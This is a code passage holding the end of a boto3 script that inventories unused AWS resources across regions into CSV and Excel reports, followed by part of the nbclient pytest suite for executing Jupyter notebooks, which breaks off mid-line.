unused_eip_detail["ResourceId"], unused_eip_detail["Region"]]) unused_resource_count[function] = eip_count def network_interface(function, credentials, unused_resource_count, region_list): print('Scanning Network Interfaces') ni_count = 0 unused_ni_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) network_interfaces = list(ec2.network_interfaces.all()) unused_nis = set([ni.network_interface_id for ni in network_interfaces if ni.status == 'available']) for network_interface_id in unused_nis: unused_ni_detail.append({'ResourceType':'AWS::EC2::NetworkInterface','ResourceId':network_interface_id,'Region':region}) ni_count+=len(unused_nis) except: pass if ni_count: unused_ni_detail = json.loads(json.dumps(unused_ni_detail)) f = csv.writer(open("./aws_logs/network_interface.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_ni_detail in unused_ni_detail: f.writerow([unused_ni_detail["ResourceType"], unused_ni_detail["ResourceId"], unused_ni_detail["Region"]]) unused_resource_count[function] = ni_count def vpc(function, credentials, unused_resource_count, region_list): print('Scanning VPCs') vpc_count = 0 unused_vpc_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) vpcs = list(ec2.vpcs.all()) network_interfaces = list(ec2.network_interfaces.all()) all_vpcs = set([vpc.vpc_id for vpc in vpcs]) all_active_vpcs = set([vpc['VpcId'] for ni in network_interfaces for vpc in ni.vpc]) unused_vpcs = all_vpcs - all_active_vpcs for vpcid in unused_vpcs: unused_vpc_detail.append({'ResourceType':'AWS::EC2::VPC','ResourceId':vpcid,'Region':region}) vpc_count+=len(unused_vpcs) except: pass if vpc_count: unused_vpc_detail = json.loads(json.dumps(unused_vpc_detail)) f = csv.writer(open("./aws_logs/vpc.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_vpc_detail in unused_vpc_detail: f.writerow([unused_vpc_detail["ResourceType"], unused_vpc_detail["ResourceId"], unused_vpc_detail["Region"]]) unused_resource_count[function] = vpc_count def subnet(function, credentials, unused_resource_count, region_list): print('Scanning Subnets') subnet_count = 0 unused_subnet_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) subnets = list(ec2.subnets.all()) network_interfaces = list(ec2.network_interfaces.all()) all_subnets = set([subnet.subnet_id for subnet in subnets]) all_active_subnets = set([subnet['SubnetId'] for ni in network_interfaces for subnet in ni.subnet]) unused_subnets = all_subnets - all_active_subnets for subnetid in unused_subnets: unused_subnet_detail.append({'ResourceType':'AWS::EC2::Subnet','ResourceId':subnetid,'Region':region}) subnet_count+=len(unused_subnets) except: pass if subnet_count: unused_subnet_detail = json.loads(json.dumps(unused_subnet_detail)) f = csv.writer(open("./aws_logs/subnet.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_subnet_detail in unused_subnet_detail: f.writerow([unused_subnet_detail["ResourceType"], unused_subnet_detail["ResourceId"], unused_subnet_detail["Region"]]) unused_resource_count[function] = subnet_count def security_group(function, credentials, unused_resource_count, region_list): print('Scanning Security Groups') sg_count = 0 unused_sg_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) sgs = list(ec2.security_groups.all()) network_interfaces = list(ec2.network_interfaces.all()) all_sgs = set([sg.group_id for sg in sgs]) all_inst_sgs = set([sg['GroupId'] for ni in network_interfaces for sg in ni.groups]) unused_sgs = all_sgs - all_inst_sgs for sgid in unused_sgs: unused_sg_detail.append({'ResourceType':'AWS::EC2::SecurityGroup','ResourceId':sgid,'Region':region}) sg_count+=len(unused_sgs) except: pass if sg_count: unused_sg_detail = json.loads(json.dumps(unused_sg_detail)) f = csv.writer(open("./aws_logs/security_group.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_sg_detail in unused_sg_detail: f.writerow([unused_sg_detail["ResourceType"], unused_sg_detail["ResourceId"], unused_sg_detail["Region"]]) unused_resource_count[function] = sg_count def classic_loadbalancer(function, credentials, unused_resource_count, region_list): print('Scanning Classic Load balancers') elb_count = 0 unused_elb_detail = [] for region in region_list: try: classic_lb = boto3.client('elb', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) paginated_data=[] elb_paginator = classic_lb.get_paginator('describe_load_balancers') for load_balancers in elb_paginator.paginate(): paginated_data.extend(load_balancers['LoadBalancerDescriptions']) for elb_detail in paginated_data: instance_health_status = [] instance_data = classic_lb.describe_instance_health(LoadBalancerName=elb_detail['LoadBalancerName'])['InstanceStates'] for instance in instance_data: instance_health_status.append(instance['State']) if 'InService' not in instance_health_status: unused_elb_detail.append({'ResourceType':'AWS::ElasticLoadBalancing::LoadBalancer','ResourceId':elb_detail['LoadBalancerName'],'Region':region}) elb_count+=1 except: pass if elb_count: unused_elb_detail = json.loads(json.dumps(unused_elb_detail)) f = csv.writer(open("./aws_logs/classic_loadbalancer.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_elb_detail in unused_elb_detail: f.writerow([unused_elb_detail["ResourceType"], unused_elb_detail["ResourceId"], unused_elb_detail["Region"]]) unused_resource_count[function] = elb_count def app_nw_gateway_loadbalancer(function, credentials, unused_resource_count, region_list): print('Scanning Application/Network/Gateway Load balancers') elbv2_count = 0 unused_elbv2_detail = [] for region in region_list: try: elbv2 = boto3.client('elbv2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) paginated_data=[] elbv2_paginator = elbv2.get_paginator('describe_load_balancers') for load_balancers in elbv2_paginator.paginate(): paginated_data.extend(load_balancers['LoadBalancers']) for elbv2_detail in paginated_data: target_health_status = [] try: target_group_detail = elbv2.describe_target_groups(LoadBalancerArn=elbv2_detail['LoadBalancerArn'])['TargetGroups'] for target_group in target_group_detail: target_group_health = elbv2.describe_target_health(TargetGroupArn=target_group['TargetGroupArn'])['TargetHealthDescriptions'] for target in target_group_health: target_health_status.append(target['TargetHealth']['State']) except: pass if 'healthy' not in target_health_status: unused_elbv2_detail.append({'ResourceType':'AWS::ElasticLoadBalancingV2::LoadBalancer', 'LoadBalancer_Type':elbv2_detail['Type'], 'ResourceId':elbv2_detail['LoadBalancerName'],'Region':region}) elbv2_count+=1 except: pass if elbv2_count: unused_elbv2_detail = json.loads(json.dumps(unused_elbv2_detail)) f = csv.writer(open("./aws_logs/app_nw_gateway_loadbalancer.csv", "w", newline='')) f.writerow(["ResourceType", "LoadBalancer_Type", "ResourceId", "Region"]) for unused_elbv2_detail in unused_elbv2_detail: f.writerow([unused_elbv2_detail["ResourceType"], unused_elbv2_detail["LoadBalancer_Type"], unused_elbv2_detail["ResourceId"], unused_elbv2_detail["Region"]]) unused_resource_count[function] = elbv2_count def iam_user(function, credentials, unused_resource_count, region_list): print('Scanning IAM Users') iamuser_count = 0 unused_iamuser_detail = [] try: iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iamuser_data = list(iam.users.all()) for user in iamuser_data: if not user.password_last_used and not iam_client.list_access_keys(UserName=user.name)['AccessKeyMetadata']: unused_iamuser_detail.append({'ResourceType':'AWS::IAM::User', 'ResourceId': user.name, 'Region':'Global'}) iamuser_count += 1 except: pass if iamuser_count: unused_iamuser_detail = json.loads(json.dumps(unused_iamuser_detail)) f = csv.writer(open("./aws_logs/iam_user.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_iamuser_detail in unused_iamuser_detail: f.writerow([unused_iamuser_detail["ResourceType"], unused_iamuser_detail["ResourceId"], unused_iamuser_detail["Region"]]) unused_resource_count[function] = iamuser_count def iam_group(function, credentials, unused_resource_count, region_list): print('Scanning IAM Groups') iamgroup_count = 0 unused_iamgroup_detail = [] try: iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iamgroup_data = list(iam.groups.all()) for group in iamgroup_data: if not iam_client.get_group(GroupName=group.name)['Users']: unused_iamgroup_detail.append({'ResourceType':'AWS::IAM::Group', 'ResourceId': group.name, 'Region':'Global'}) iamgroup_count += 1 except: pass if iamgroup_count: unused_iamgroup_detail = json.loads(json.dumps(unused_iamgroup_detail)) f = csv.writer(open("./aws_logs/iam_group.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_iamgroup_detail in unused_iamgroup_detail: f.writerow([unused_iamgroup_detail["ResourceType"], unused_iamgroup_detail["ResourceId"], unused_iamgroup_detail["Region"]]) unused_resource_count[function] = iamgroup_count def main(arg): access_key = arg.accessKey secret_key = arg.secretKey region_list = [] unused_resource_details = {} try: print("Connecting to AWS account ") session = boto3.session.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key) except: print("\033[1;31;40m ""Please do Check for Credentials provided or Internet Connection and Try Again\n") quit() iam = session.client('sts') account_id = iam.get_caller_identity()["Account"] print("Successfully connected to AWS account", account_id) print("Scanning for unused resources across all available regions.") print("Wait for few minutes...\n") function_list= [ ebs_volume, elastic_ip, network_interface, vpc, subnet, security_group, classic_loadbalancer, app_nw_gateway_loadbalancer, iam_user, iam_group ] print("Collecting list of enabled region") available_regions = session.client('ec2',region_name="us-east-1") enabled_regions = available_regions.describe_regions()['Regions'] for region in enabled_regions: region_list.append(region['RegionName']) manager = multiprocessing.Manager() unused_resource_count = manager.dict() credentials = manager.dict() credentials['access_key'] = access_key credentials['secret_key'] = secret_key credentials['account_id'] = account_id jobs = [] try: os.mkdir("./aws_logs") except: pass for function in function_list: try: p = multiprocessing.Process(target=function, args=(function, credentials, unused_resource_count, region_list)) jobs.append(p) p.start() except: print("Exception occurred while creating processes. Please try again later!") quit() if jobs: for process in jobs: try: process.join() except: print("Exception occurred while joining processes. Please try again later!") quit() os.chdir('./aws_logs') writer = pd.ExcelWriter('unused_resources.xlsx') all_files = glob.glob("*.csv") for f in all_files: df = pd.read_csv(f) df.to_excel(writer,sheet_name=f.split('.')[0], index=False) writer.save() for f in all_files: os.remove(f) print("Completed account scan") # Updating Resource Count Object unused_resource_details.update({ 'AWS::EC2::Volume': unused_resource_count[ebs_volume], 'AWS::EC2::EIP': unused_resource_count[elastic_ip], 'AWS::EC2::NetworkInterface': unused_resource_count[network_interface], 'AWS::EC2::VPC': unused_resource_count[vpc], 'AWS::EC2::Subnet': unused_resource_count[subnet], 'AWS::EC2::SecurityGroup': unused_resource_count[security_group], 'AWS::ElasticLoadBalancing::LoadBalancer': unused_resource_count[classic_loadbalancer], 'AWS::ElasticLoadBalancingV2::LoadBalancer': unused_resource_count[app_nw_gateway_loadbalancer], 'AWS::IAM::User': unused_resource_count[iam_user], 'AWS::IAM::Group': unused_resource_count[iam_group] }) # Showing Resource Distribution print("\nUnused Resources in the Account:") unused_resource_count = 0 for key, value in sorted(unused_resource_details.items(), key=lambda x: x[1], reverse=True): if value != 0: print("\t{} : {}".format(key, value)) unused_resource_count+=value print("\n\nSummary:") print("\tTotal Unused Resources:", unused_resource_count) print("\n\nDetailed unused resource information can be found at: aws_logs/unused_resources.xlsx") if(__name__ == '__main__'): arg_parser = argparse.ArgumentParser(prog='unused_aws_resources', usage='%(prog)s [options]', description='Count AWS resources') # Add the arguments arg_parser.add_argument('--accessKey', type=str, required=True, help='AWS Access Key') arg_parser.add_argument('--secretKey', type=str, required=True, help='AWS Secret Key') # Execute the parse_args() method args = arg_parser.parse_args() main(args)
test_client.py
import asyncio import concurrent.futures import copy import datetime import functools import os import re import threading import warnings from base64 import b64decode, b64encode from queue import Empty from unittest.mock import MagicMock, Mock import nbformat import pytest import xmltodict from jupyter_client import KernelManager from jupyter_client.kernelspec import KernelSpecManager from nbconvert.filters import strip_ansi from nbformat import NotebookNode from testpath import modified_env from traitlets import TraitError from .. import NotebookClient, execute from ..exceptions import CellExecutionError from .base import NBClientTestsBase addr_pat = re.compile(r'0x[0-9a-f]{7,9}') current_dir = os.path.dirname(__file__) ipython_input_pat = re.compile( r'(<ipython-input-\d+-[0-9a-f]+>|<IPY-INPUT>) in (<module>|<cell line: \d>\(\))' ) # Tracebacks look different in IPython 8, # see: https://github.com/ipython/ipython/blob/master/docs/source/whatsnew/version8.rst#traceback-improvements # noqa ipython8_input_pat = re.compile( r'(Input In \[\d+\]|<IPY-INPUT>), in (<module>|<cell line: \d>\(\))' ) hook_methods = [ "on_cell_start", "on_cell_execute", "on_cell_complete", "on_cell_executed", "on_cell_error", "on_notebook_start", "on_notebook_complete", "on_notebook_error", ] def get_executor_with_hooks(nb=None, executor=None, async_hooks=False): if async_hooks: hooks = {key: AsyncMock() for key in hook_methods} else: hooks = {key: MagicMock() for key in hook_methods} if nb is not None: if executor is not None: raise RuntimeError("Cannot pass nb and executor at the same time") executor = NotebookClient(nb) for k, v in hooks.items(): setattr(executor, k, v) return executor, hooks EXECUTE_REPLY_OK = { 'parent_header': {'msg_id': 'fake_id'}, 'content': {'status': 'ok', 'execution_count': 1}, } EXECUTE_REPLY_ERROR = { 'parent_header': {'msg_id': 'fake_id'}, 'content': {'status': 'error'}, 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, } class AsyncMock(Mock): pass def make_async(mock_value): async def _(): return mock_value return _() def normalize_base64(b64_text): # if it's base64, pass it through b64 decode/encode to avoid # equivalent values from being considered unequal try: return b64encode(b64decode(b64_text.encode('ascii'))).decode('ascii') except (ValueError, TypeError): return b64_text def run_notebook(filename, opts, resources=None): """Loads and runs a notebook, returning both the version prior to running it and the version after running it. """ with open(filename) as f: input_nb = nbformat.read(f, 4) cleaned_input_nb = copy.deepcopy(input_nb) for cell in cleaned_input_nb.cells: if 'execution_count' in cell: del cell['execution_count'] cell['outputs'] = [] if resources: opts = {'resources': resources, **opts} executor = NotebookClient(cleaned_input_nb, **opts) with warnings.catch_warnings(): # suppress warning from jupyter_client's deprecated cleanup() warnings.simplefilter(action='ignore', category=FutureWarning) # Override terminal size to standardise traceback format with modified_env({'COLUMNS': '80', 'LINES': '24'}): output_nb = executor.execute() return input_nb, output_nb def run_notebook_wrapper(args): # since concurrent.futures.ProcessPoolExecutor doesn't have starmap, # we need to unpack the arguments return run_notebook(*args) async def async_run_notebook(filename, opts, resources=None): """Loads and runs a notebook, returning both the version prior to running it and the version after running it. """ with open(filename) as f: input_nb = nbformat.read(f, 4) cleaned_input_nb = copy.deepcopy(input_nb) for cell in cleaned_input_nb.cells: if 'execution_count' in cell: del cell['execution_count'] cell['outputs'] = [] if resources: opts = {'resources': resources, **opts} executor = NotebookClient(cleaned_input_nb, **opts) # Override terminal size to standardise traceback format with modified_env({'COLUMNS': '80', 'LINES': '24'}): output_nb = await executor.async_execute() return input_nb, output_nb def prepare_cell_mocks(*messages_input, reply_msg=None): """ This function prepares a executor object which has a fake kernel client to mock the messages sent over zeromq. The mock kernel client will return the messages passed into this wrapper back from ``preproc.kc.iopub_channel.get_msg`` callbacks. It also appends a kernel idle message to the end of messages. """ parent_id = 'fake_id' messages = list(messages_input) # Always terminate messages with an idle to exit the loop messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}}) def shell_channel_message_mock(): # Return the message generator for # self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}} return AsyncMock( return_value=make_async( NBClientTestsBase.merge_dicts( { 'parent_header': {'msg_id': parent_id}, 'content': {'status': 'ok', 'execution_count': 1}, }, reply_msg or {}, ) ) ) def iopub_messages_mock(): # Return the message generator for # self.kc.iopub_channel.get_msg => messages[i] return AsyncMock( side_effect=[ # Default the parent_header so mocks don't need to include this make_async( NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg) ) for msg in messages ] ) def prepared_wrapper(func): @functools.wraps(func) def test_mock_wrapper(self): """ This inner function wrapper populates the executor object with the fake kernel client. This client has its iopub and shell channels mocked so as to fake the setup handshake and return the messages passed into prepare_cell_mocks as the execute_cell loop processes them. """ cell_mock = NotebookNode( source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[] ) executor = NotebookClient({}) executor.nb = {'cells': [cell_mock]} # self.kc.iopub_channel.get_msg => message_mock.side_effect[i] message_mock = iopub_messages_mock() executor.kc = MagicMock( iopub_channel=MagicMock(get_msg=message_mock), shell_channel=MagicMock(get_msg=shell_channel_message_mock()), execute=MagicMock(return_value=parent_id), is_alive=MagicMock(return_value=make_async(True)), ) executor.parent_id = parent_id return func(self, executor, cell_mock, message_mock) return test_mock_wrapper return prepared_wrapper def normalize_output(output): """ Normalizes outputs for comparison. """ output = dict(output) if 'metadata' in output: del output['metadata'] if 'text' in output: output['text'] = re.sub(addr_pat, '<HEXADDR>', output['text']) if 'text/plain' in output.get('data', {}): output['data']['text/plain'] = re.sub(addr_pat, '<HEXADDR>', output['data']['text/plain']) if 'application/vnd.jupyter.widget-view+json' in output.get('data', {}): output['data']['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>' if 'image/svg+xml' in output.get('data', {}): output['data']['image/svg+xml'] = xmltodict.parse(output['data']['image/svg+xml']) for key, value in output.get('data', {}).items(): if isinstance(value, str): output['data'][key] = normalize_base64(value) if 'traceback' in output: tb = [] for line in output["traceback"]: line = re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(line)) line = re.sub(ipython8_input_pat, '<IPY-INPUT>', strip_ansi(line)) tb.append(line) output['traceback'] = tb return output def assert_notebooks_equal(expected, actual): expected_cells = expected['cells'] actual_cells = actual['cells'] assert len(expected_cells) == len(actual_cells) for expected_cell, actual_cell in zip(expected_cells, actual_cells): # Uncomment these to help debug test failures better # from pprint import pprint # pprint(expected_cell) # pprint(actual_cell) expected_outputs = expected_cell.get('outputs', []) actual_outputs = actual_cell.get('outputs', []) normalized_expected_outputs = list(map(normalize_output, expected_outputs)) normalized_actual_outputs = list(map(normalize_output, actual_outputs)) assert normalized_expected_outputs == normalized_actual_outputs expected_execution_count = expected_cell.get('execution_count', None) actual_execution_count = actual_cell.get('execution_count', None) assert expected_execution_count == actual_execution_count def notebook_resources(): """ Prepare a notebook resources dictionary for executing test notebooks in the ``files`` folder. """ return {'metadata': {'path': os.path.join(current_dir, 'files')}} def filter_messages_on_error_output(err_output): allowed_lines = [ # ipykernel migh be installed without debugpy extension "[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled", ] filtered_result = [line for line in err_output.splitlines() if line not in allowed_lines] return os.linesep.join(filtered_result) @pytest.mark.parametrize( ["input_name", "opts"], [ ("Other Comms.ipynb", dict(kernel_name="python")), ("Clear Output.ipynb", dict(kernel_name="python")), ("Empty Cell.ipynb", dict(kernel_name="python")), ("Factorials.ipynb", dict(kernel_name="python")), ("HelloWorld.ipynb", dict(kernel_name="python")), ("Inline Image.ipynb", dict(kernel_name="python")), ( "Interrupt.ipynb", dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True), ), ("JupyterWidgets.ipynb", dict(kernel_name="python")), ("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")), ("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)), ("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")), ("SVG.ipynb", dict(kernel_name="python")), ("Unicode.ipynb", dict(kernel_name="python")), ("UnicodePy3.ipynb", dict(kernel_name="python")), ("update-display-id.ipynb", dict(kernel_name="python")), ("Check History in Memory.ipynb", dict(kernel_name="python")), ], ) def test_run_all_notebooks(input_name, opts): """Runs a series of test notebooks and compares them to their actual output""" input_file = os.path.join(current_dir, 'files', input_name) input_nb, output_nb = run_notebook(input_file, opts, notebook_resources()) assert_notebooks_equal(input_nb, output_nb) def test_parallel_notebooks(capfd, tmpdir): """Two notebooks should be able to be run simultaneously without problems. The two notebooks spawned here use the filesystem to check that the other notebook wrote to the filesystem.""" opts = dict(kernel_name="python") input_name = "Parallel Execute {label}.ipynb" input_file = os.path.join(current_dir, "files", input_name) res = notebook_resources() with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}): threads = [ threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res)) for label in ("A", "B") ] for t in threads: t.start() for t in threads: t.join(timeout=2) captured = capfd.readouterr() assert filter_messages_on_error_output(captured.err) == "" def test_many_parallel_notebooks(capfd): """Ensure that when many IPython kernels are run in parallel, nothing awful happens. Specifically, many IPython kernels when run simultaneously would encounter errors due to using the same SQLite history database. """ opts = dict(kernel_name="python", timeout=5) input_name = "HelloWorld.ipynb" input_file = os.path.join(current_dir, "files", input_name) res = NBClientTestsBase().build_resources() res["metadata"]["path"] = os.path.join(current_dir, "files") with warnings.catch_warnings(): # suppress warning from jupyter_client's deprecated cleanup() warnings.simplefilter(action='ignore', category=FutureWarning) # run once, to trigger creating the original context run_notebook(input_file, opts, res) with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor: executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)]) captured = capfd.readouterr() assert filter_messages_on_error_output(captured.err) == "" def test_async_parallel_notebooks(capfd, tmpdir): """Two notebooks should be able to be run simultaneously without problems. The two notebooks spawned here use the filesystem to check that the other notebook wrote to the filesystem.""" opts = dict(kernel_name="python") input_name = "Parallel Execute {label}.ipynb" input_file = os.path.join(current_dir, "files", input_name) res = notebook_resources() with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}): tasks = [ async_run_notebook(input_file.format(label=label), opts, res) for label in ("A", "B") ] loop = asyncio.get_event_loop() loop.run_until_complete(asyncio.gather(*tasks)) captured = capfd.readouterr() assert filter_messages_on_error_output(captured.err) == "" def test_many_async_parallel_notebooks(capfd): """Ensure that when many IPython kernels are run in parallel, nothing awful happens. Specifically, many IPython kernels when run simultaneously would encounter errors due to using the same SQLite history database. """ opts = dict(kernel_name="python", timeout=5) input_name = "HelloWorld.ipynb" input_file = os.path.join(current_dir, "files", input_name) res = NBClientTestsBase().build_resources() res["metadata"]["path"] = os.path.join(current_dir, "files") # run once, to trigger creating the original context run_notebook(input_file, opts, res) tasks = [async_run_notebook(input_file, opts, res) for i in range(4)] loop = asyncio.get_event_loop() loop.run_until_complete(asyncio.gather(*tasks)) captured = capfd.readouterr() assert filter_messages_on_error_output(captured.err) == "" def test_execution_timing(): """Compare the execution timing information stored in the cell with the actual time it took to run the cell. Also check for the cell timing string format.""" opts = dict(kernel_name="python") input_name = "Sleep1s.ipynb" input_file = os.path.join(current_dir, "files", input_name) res = notebook_resources() input_nb, output_nb = run_notebook(input_file, opts, res) def get_time_from_str(s): time_format = '%Y-%m-%dT%H:%M:%S.%fZ' return datetime.datetime.strptime(s, time_format) execution_timing = output_nb['cells'][1]['metadata']['execution'] status_busy = get_time_from_str(execution_timing['iopub.status.busy']) execute_input = get_time_from_str(execution_timing['iopub.execute_input']) execute_reply = get_time_from_str(execution_timing['shell.execute_reply']) status_idle = get_time_from_str(execution_timing['iopub.status.idle']) cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text']) cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text']) delta = datetime.timedelta(milliseconds=100) assert status_busy - cell_start < delta assert execute_input - cell_start < delta assert execute_reply - cell_end < delta assert status_idle - cell_end < delta def test_synchronous_setup_kernel(): nb = nbformat.v4.new_notebook() executor = NotebookClient(nb) with executor.setup_kernel(): # Prove it initialized client assert executor.kc is not None # Prove it removed the client (and hopefully cleaned up) assert executor.kc is None def test_startnewkernel_with_kernelmanager(): nb = nbformat.v4.new_notebook() km = KernelManager() executor = NotebookClient(nb, km=km) executor.start_new_kernel() kc = executor.start_new_kernel_client() # prove it initialized client assert kc is not None # since we are not using the setup_kernel context manager, # cleanup has to be done manually kc.shutdown() km.cleanup_resources() kc.stop_channels() def test_start_new_kernel_history_file_setting(): nb = nbformat.v4.new_notebook() km = KernelManager() executor = NotebookClient(nb, km=km) kc = km.client() # Should start empty assert executor.extra_arguments == [] # Should assign memory setting for ipykernel executor.start_new_kernel() assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:'] # Should not add a second hist_file assignment executor.start_new_kernel() assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:'] # since we are not using the setup_kernel context manager, # cleanup has to be done manually kc.shutdown() km.cleanup_resources() kc.stop_channels() class TestExecute(NBClientTestsBase): """Contains test functions for execute.py""" maxDiff = None def test_constructor(self): NotebookClient({}) def test_populate_language_info(self): nb = nbformat.v4.new_notebook() # Certainly has no language_info. executor = NotebookClient(nb, kernel_name="python") nb = executor.execute() assert 'language_info' in nb.metadata def test_empty_path(self): """Can the kernel be started when the path is empty?""" filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') res = self.build_resources() res['metadata']['path'] = '' input_nb, output_nb = run_notebook(filename, {}, res) assert_notebooks_equal(input_nb, output_nb) @pytest.mark.xfail( "python3" not in KernelSpecManager().find_kernel_specs(), reason="requires a python3 kernelspec", ) def test_empty_kernel_name(self): """Can kernel in nb metadata be found when an empty string is passed? Note: this pattern should be discouraged in practice. Passing in no kernel_name to NotebookClient is recommended instead. """ filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb') res = self.build_resources() input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res) assert_notebooks_equal(input_nb, output_nb) with pytest.raises(TraitError): input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res) def test_disable_stdin(self): """Test disabling standard input""" filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb') res = self.build_resources() res['metadata']['path'] = os.path.dirname(filename) input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res) # We need to special-case this particular notebook, because the # traceback contains machine-specific stuff like where IPython # is installed. It is sufficient here to just check that an error # was thrown, and that it was a StdinNotImplementedError self.assertEqual(len(output_nb['cells']), 1) self.assertEqual(len(output_nb['cells'][0]['outputs']), 1) output = output_nb['cells'][0]['outputs'][0] self.assertEqual(output['output_type'], 'error') self.assertEqual(output['ename'], 'StdinNotImplementedError') self.assertEqual( output['evalue'], 'raw_input was called, but this frontend does not support input requests.', ) def test_timeout(self): """Check that an error is raised when a computation times out""" filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb') res = self.build_resources() res['metadata']['path'] = os.path.dirname(filename) with pytest.raises(TimeoutError) as err: run_notebook(filename, dict(timeout=1), res) self.assertEqual( str(err.value.args[0]), """A cell timed out while it was being executed, after 1 seconds. The message was: Cell execution timed out. Here is a preview of the cell contents: ------------------- while True: continue ------------------- """, ) def test_timeout_func(self): """Check that an error is raised when a computation times out""" filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb') res = self.build_resources() res['metadata']['path'] = os.path.dirname(filename) def timeout_func(source): return 10 with pytest.raises(TimeoutError): run_notebook(filename, dict(timeout_func=timeout_func), res) def test_kernel_death_after_timeout(self): """Check that an error is raised when the kernel is_alive is false after a cell timed out""" filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) res = self.build_resources() res['metadata']['path'] = os.path.dirname(filename) executor = NotebookClient(input_nb, timeout=1) with pytest.raises(TimeoutError): executor.execute() km = executor.create_kernel_manager() async def is_alive(): return False km.is_alive = is_alive # Will be a RuntimeError or subclass DeadKernelError depending # on if jupyter_client or nbconvert catches the dead client first with pytest.raises(RuntimeError): input_nb, output_nb = executor.execute() def test_kernel_death_during_execution(self): """Check that an error is raised when the kernel is_alive is false during a cell execution. """ filename = os.path.join(current_dir, 'files', 'Autokill.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor = NotebookClient(input_nb) with pytest.raises(RuntimeError): executor.execute() def test_allow_errors(self): """ Check that conversion halts if ``allow_errors`` is False. """ filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb') res = self.build_resources() res['metadata']['path'] = os.path.dirname(filename) with pytest.raises(CellExecutionError) as exc: run_notebook(filename, dict(allow_errors=False), res) self.assertIsInstance(str(exc.value), str) assert "# üñîçø∂é" in str(exc.value) def test_force_raise_errors(self): """ Check that conversion halts if the ``force_raise_errors`` traitlet on NotebookClient is set to True. """ filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb') res = self.build_resources() res['metadata']['path'] = os.path.dirname(filename) with pytest.raises(CellExecutionError) as exc: run_notebook(filename, dict(force_raise_errors=True), res) self.assertIsInstance(str(exc.value), str) assert "# üñîçø∂é" in str(exc.value) def test_reset_kernel_client(self): filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor = NotebookClient( input_nb, resources=self.build_resources(), ) executor.execute(cleanup_kc=False) # we didn't ask to reset the kernel client, a new one must have been created kc = executor.kc assert kc is not None executor.execute(cleanup_kc=False) # we didn't ask to reset the kernel client, the previously created one must have been reused assert kc == executor.kc executor.execute(reset_kc=True, cleanup_kc=False) # we asked to reset the kernel client, the previous one must have been cleaned up, # a new one must have been created assert kc != executor.kc def test_cleanup_kernel_client(self): filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) executor = NotebookClient( input_nb, resources=self.build_resources(), ) executor.execute() # we asked to cleanup the kernel client (default is True) assert executor.kc is None executor.execute(cleanup_kc=False) # we didn't ask to reset the kernel client # a new one must have been created and should still be available assert executor.kc is not None def test_custom_kernel_manager(self): from .fake_kernelmanager import FakeCustomKernelManager filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb') with open(filename) as f: input_nb = nbformat.read(f, 4) cleaned_input_nb = 